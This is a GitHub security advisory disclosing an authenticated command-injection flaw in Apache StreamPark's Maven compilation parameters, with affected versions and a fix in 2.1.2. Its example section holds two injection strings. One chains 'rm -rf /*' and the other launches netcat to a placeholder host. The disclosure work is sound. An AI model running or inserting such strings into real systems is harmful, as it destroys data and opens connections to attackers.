Apache StreamPark: Authenticated system users could trigger remote command execution
Critical severity
GitHub Reviewed
Published
Dec 15, 2023
to the GitHub Advisory Database
•
Updated Dec 16, 2023
Package
Affected versions
>= 2.0.0, < 2.1.2
Patched versions
2.1.2
Description
Published by the National Vulnerability Database
Dec 15, 2023
Published to the GitHub Advisory Database
Dec 15, 2023
Reviewed
Dec 16, 2023
Last updated
Dec 16, 2023
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.2
Example:
##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
References